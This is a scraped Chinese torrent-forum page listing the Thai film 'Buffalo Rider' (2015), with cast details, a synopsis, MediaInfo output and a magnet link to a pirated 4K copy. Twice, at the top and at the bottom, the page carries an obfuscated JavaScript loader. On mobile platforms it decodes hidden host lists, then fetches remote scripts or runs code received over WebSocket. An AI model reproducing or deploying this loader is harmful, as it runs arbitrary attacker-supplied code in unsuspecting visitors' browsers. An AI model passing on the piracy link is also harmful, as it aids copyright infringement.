水牛骑士[中文字幕].Buffalo.Rider.2015.2160p.WEB-DL.H264.AAC 15.86GB

版主小s 1月前 169

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 水牛骑士

◎片 名 Buffalo Rider

◎年 代 2015

◎产 地 泰国

◎类 别 剧情

◎语 言 泰语 / 英语

◎IMDb链接 https://www.imdb.com/title/tt4170514/

◎豆瓣链接 https://movie.douban.com/subject/26740401/

◎片 长 94 分钟

◎导 演 乔尔·苏瓦松 Joel Soisson (id:1355426)

◎编 剧 乔尔·苏瓦松 Joel Soisson (id:1355426)

查理万·塔夫瑞农 Chariyawan Tavoranon (id:1356752)

◎演 员 莉莉·布萨迪特南 Lily Bhusadhit-a-nan (id:1355427)

拓达彭·路基塔瓦德 Tuchapong Rugtawatr (id:1355428)

齐娜帕·齐迪柴瓦郎古 Chinnapat Kitichaivaranggoon (id:1355429)

杰弗里·朱利亚诺 Geoffrey Giuliano (id:1093313)

费妮达·萨瓦萨德 Phanida Suwansaad (id:1356421)

吉米·S·米斯瑞 Jim S. Meesri (id:1356422)

◎标 签 泰国 / 泰国电影 / 剧情 / 电影 / 冷门 / 2016北影节 / 2015 / 拿到

◎简 介

一个在美国出生的泰国裔女孩,被送回泰国农村和亲戚们生活,自小就叛逆的她看起来和整个村子里的人都格格不入,直到她慢慢和一个村里的哑巴小男孩成为朋友,并试着鼓励他参加一年一度的水牛竞赛…一个在美国出生的泰国裔女孩,被送回泰国农村和亲戚们生活,自小就叛逆的她看起来和整个村子里的人都格格不入,直到她慢慢和一个村里的哑巴小男孩成为朋友,并试着鼓励他参加一年一度的水牛竞赛…

  1. ##### MediaInfo ######

  2. General

  3. Complete name : 水牛骑士[email protected]

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom/iso2/avc1/mp41)

  7. File size : 15.9 GiB

  8. Duration : 1 h 29 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 25.2 Mb/s

  11. Writing application : OurTV Multimedia Platform


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : 2 Ref Frames

  18. Format settings, CABAC : No

  19. Format settings, Reference frames : 2 frames

  20. Format settings, GOP : M=2, N=120

  21. Codec ID : avc1

  22. Codec ID/Info : Advanced Video Coding

  23. Duration : 1 h 29 min

  24. Source duration : 1 h 29 min

  25. Bit rate mode : Variable

  26. Bit rate : 23.9 Mb/s

  27. Maximum bit rate : 768 kb/s

  28. Width : 3 840 pixels

  29. Height : 2 160 pixels

  30. Display aspect ratio : 16:9

  31. Frame rate mode : Constant

  32. Frame rate : 25.000 FPS

  33. Color space : YUV

  34. Chroma subsampling : 4:2:0

  35. Bit depth : 8 bits

  36. Scan type : Progressive

  37. Bits/(Pixel*Frame) : 0.115

  38. Stream size : 15.0 GiB (95%)

  39. Source stream size : 15.7 GiB (99%)

  40. Color range : Limited

  41. Color primaries : BT.709

  42. Matrix coefficients : BT.709

  43. mdhd_Duration : 5398383

  44. Codec configuration box : avcC


  45. Audio

  46. ID : 2

  47. Format : AAC LC

  48. Format/Info : Advanced Audio Codec Low Complexity

  49. Codec ID : mp4a-40-2

  50. Duration : 1 h 29 min

  51. Bit rate mode : Variable

  52. Bit rate : 323 kb/s / 323 kb/s

  53. Channel(s) : 2 channels

  54. Channel layout : L R

  55. Sampling rate : 48.0 kHz

  56. Frame rate : 46.875 FPS (1024 SPF)

  57. Compression mode : Lossy

  58. Stream size : 206 MiB (1%)

  59. Default : Yes

  60. Alternate group : 1




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:3E65147B7339C1FD996B39D76110DA751E9ED90E

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};